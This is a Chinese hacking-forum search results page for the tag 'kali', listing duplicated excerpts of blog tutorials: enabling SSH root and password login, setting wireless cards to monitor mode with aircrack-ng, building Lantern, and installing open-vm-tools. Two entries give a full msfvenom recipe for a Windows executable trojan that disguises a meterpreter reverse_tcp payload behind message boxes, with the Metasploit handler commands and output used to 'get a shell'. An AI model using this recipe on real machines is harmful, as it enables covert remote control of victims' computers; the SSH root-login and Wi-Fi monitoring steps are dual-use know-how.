跳转到帖子

搜索论坛

显示结果为标签'kali'。

  • 用标签来搜索

    用逗号分隔标签类型
  • 用作者来搜索

内容类型


论坛

  • 漏洞与黑客攻击防御安全领域
    • 黑客攻防业务合作
    • 世界黑客新闻动态
    • WEB和服务器安全漏洞
    • CHT漏洞数据库
    • Linux Kali高级学习教程
    • CTF&密码学与社会工程
    • 木马病毒分析
    • 黑客世界会员中心
  • 问题讨论中心
    • 问答中心
    • 交流中心
  • 编程开发
    • 各种编程技术
    • ios /安卓开发
  • CHT官方团队介绍及比赛制度
    • CTF攻防系统[供会员使用]
    • 积分商场
    • 积分跳马系统
    • 积分统计系统

产品组

  • Hacker attack and defense security hardware series
  • Internet Security Book Recommendations

博客

没有结果。

没有结果。

类别

  • Hacker Attack and Defense & Network Security Videos

查找结果在…

查找包含的结果…


创建日期

  • 开始

    结束


最后更新

  • 开始

    结束


按数量过滤…

注册日期

  • 开始

    结束


用户组


About Me

找到10个结果

  1. 一、配置SSH参数修改sshd_config文件,命令为:vi /etc/ssh/sshd_config 将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes 将PermitRootLogin without-password修改为PermitRootLogin yes 然后保存退出vi编辑器。 二、启动SSH服务命令为:/etc/init.d/ssh start 或者service ssh start 查看SSH服务状态是否正常运行,命令为: /etc/init.d/ssh status 或者 service ssh status注明:这两种启动ssh方式都是临时性的,如果机器重启就需要重新输入上面命令才可以开启ssh,如果需要ssh服务下次开机自动启动,则需要使用以下命令启动ssh服务,命令为: update-rc.d ssh enable //系统自动启动SSH服务 update-rc.d ssh disabled // 关闭系统自动启动SSH服务三、错误解决如果以上两个步骤都操作完了还是登陆不了kali linux的ssh,则需要生成两个秘钥 那么要先生成两个密钥: #ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key #ssh-keygen -t dsa -f /etc/ssh/ssh_host_rsa_key执行命令后都会让输入密码,直接敲回车设置为空即可 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/98.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  2. 一、配置SSH参数修改sshd_config文件,命令为:vi /etc/ssh/sshd_config 将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes 将PermitRootLogin without-password修改为PermitRootLogin yes 然后保存退出vi编辑器。 二、启动SSH服务命令为:/etc/init.d/ssh start 或者service ssh start 查看SSH服务状态是否正常运行,命令为: /etc/init.d/ssh status 或者 service ssh status注明:这两种启动ssh方式都是临时性的,如果机器重启就需要重新输入上面命令才可以开启ssh,如果需要ssh服务下次开机自动启动,则需要使用以下命令启动ssh服务,命令为: update-rc.d ssh enable //系统自动启动SSH服务 update-rc.d ssh disabled // 关闭系统自动启动SSH服务三、错误解决如果以上两个步骤都操作完了还是登陆不了kali linux的ssh,则需要生成两个秘钥 那么要先生成两个密钥: #ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key #ssh-keygen -t dsa -f /etc/ssh/ssh_host_rsa_key执行命令后都会让输入密码,直接敲回车设置为空即可 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/98.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  3. 对于升级后的aircrack-ng 和以前的 大不一样,特别是监听模式的设置,很多人会出现找不到设备会命令出错的各种原因我们先去官网(http://www.aircrack-ng.org/doku.php?id=compatibility_drivers)确定自己网卡是否有被kali2集成后就可以按照以下步骤 进行新的命令操作: 第一步:在设置监听模式前先输入airmon-ng check kill结束进程 第二步:和以前一样载入网卡airmon-ng start wlan0(自己的网卡名) 第三步:他会自动创建一个 wlan0mon接口 记住这个 接口名 而不是以前的mon0 第四步:建立监听 airodump-ng wlan0mon 如果在第四步发现出现错误 那么 有三种可能第一 你的网卡不支持监听模式,第二你的wlan0mon输入错误,第三网卡被其他进程给调用无法获取 第三种情况解决方法:执行airmon-ng check kill 执行 ifconfig wlan0mon up airmon-ng stop wlan0mon 最后跳回上面的第二部进行 如果还不行 那就拔掉网卡 或重启 再次ifconfig 查找时候有无线网卡 标识名一般以wlan开头 如果没有 就 ifconfig wlan0 (或者wlan1 wlan2.。。。载入) up 发现了 并载入了 wlan0跟着第一步走一般不会出错 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/114.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  4. 对于升级后的aircrack-ng 和以前的 大不一样,特别是监听模式的设置,很多人会出现找不到设备会命令出错的各种原因我们先去官网(http://www.aircrack-ng.org/doku.php?id=compatibility_drivers)确定自己网卡是否有被kali2集成后就可以按照以下步骤 进行新的命令操作: 第一步:在设置监听模式前先输入airmon-ng check kill结束进程 第二步:和以前一样载入网卡airmon-ng start wlan0(自己的网卡名) 第三步:他会自动创建一个 wlan0mon接口 记住这个 接口名 而不是以前的mon0 第四步:建立监听 airodump-ng wlan0mon 如果在第四步发现出现错误 那么 有三种可能第一 你的网卡不支持监听模式,第二你的wlan0mon输入错误,第三网卡被其他进程给调用无法获取 第三种情况解决方法:执行airmon-ng check kill 执行 ifconfig wlan0mon up airmon-ng stop wlan0mon 最后跳回上面的第二部进行 如果还不行 那就拔掉网卡 或重启 再次ifconfig 查找时候有无线网卡 标识名一般以wlan开头 如果没有 就 ifconfig wlan0 (或者wlan1 wlan2.。。。载入) up 发现了 并载入了 wlan0跟着第一步走一般不会出错 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/114.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  5. git clone https://github.com/getlantern/lantern.git sudoapt-getinstalllibc6-dev-i386golangnpmlibappindicator3-devlibgtk-3-devlibappindicator3-y npmigulp-g link/usr/bin/nodejs/usr/bin/node cdlantern makelantern ./lantern 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/119.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  6. 自从Kali 2.0发布之后,会经常遇到安装vmware tools无法成功,或者提示安装成功了但是仍旧无法进行文件拖拽、复制和剪切的问题。 今天给新电脑装系统,重新下载了最新版,Kali 2017.1发现已经是Kali 3了。 经测试,安装Open-vm-tools替代VMware tools能够完美实现“自动适应客户机”(即自动适应客户机的分辨率,随意改变窗口大小)和与宿主机之间文件的复制粘贴功能。 安装apt-get install open-vm-tools-desktop fuse重启reboot 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/121.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  7. git clone https://github.com/getlantern/lantern.git sudoapt-getinstalllibc6-dev-i386golangnpmlibappindicator3-devlibgtk-3-devlibappindicator3-y npmigulp-g link/usr/bin/nodejs/usr/bin/node cdlantern makelantern ./lantern 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/119.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  8. 自从Kali 2.0发布之后,会经常遇到安装vmware tools无法成功,或者提示安装成功了但是仍旧无法进行文件拖拽、复制和剪切的问题。 今天给新电脑装系统,重新下载了最新版,Kali 2017.1发现已经是Kali 3了。 经测试,安装Open-vm-tools替代VMware tools能够完美实现“自动适应客户机”(即自动适应客户机的分辨率,随意改变窗口大小)和与宿主机之间文件的复制粘贴功能。 安装apt-get install open-vm-tools-desktop fuse重启reboot 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/121.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  9. 一:制作对话框msfvenom -a x86 --platform windows -p windows/messagebox TEXT="bbskali.cn" -f raw > messageBox -a:操作系统的类型 64位和32位 -p:指定攻击平台 windows TEXT:对话框中显示的文字 -f:输出格式 二:制作二级标题msfvenom -c messageBox -a x86 --platform windows -p windows/messagebox TEXT="blog.bbskali.cn" -f raw > messageBox2 三:将c++打包生成exemsfvenom -c messageBox2 -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.209 LPORT=5555 -f exe -o Z.exeLHOST:本机ip地址 LPORT:端口 -o :生成文件 四:终端启动msfconsole并配置参数msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(multi/handler) > set LHOST 192.168.3.209 LHOST => 192.168.3.209 msf exploit(multi/handler) > set LPORT 5555 LPORT => 5555 msf exploit(multi/handler) > exploit五:运行马儿 六:得到shell 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/169.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  10. 一:制作对话框msfvenom -a x86 --platform windows -p windows/messagebox TEXT="bbskali.cn" -f raw > messageBox -a:操作系统的类型 64位和32位 -p:指定攻击平台 windows TEXT:对话框中显示的文字 -f:输出格式 二:制作二级标题msfvenom -c messageBox -a x86 --platform windows -p windows/messagebox TEXT="blog.bbskali.cn" -f raw > messageBox2 三:将c++打包生成exemsfvenom -c messageBox2 -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.209 LPORT=5555 -f exe -o Z.exeLHOST:本机ip地址 LPORT:端口 -o :生成文件 四:终端启动msfconsole并配置参数msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(multi/handler) > set LHOST 192.168.3.209 LHOST => 192.168.3.209 msf exploit(multi/handler) > set LPORT 5555 LPORT => 5555 msf exploit(multi/handler) > exploit五:运行马儿 六:得到shell 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/169.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    ×
    ×
    • 创建新的...